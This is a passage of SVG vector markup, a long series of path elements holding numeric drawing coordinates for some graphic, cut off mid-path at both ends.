d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4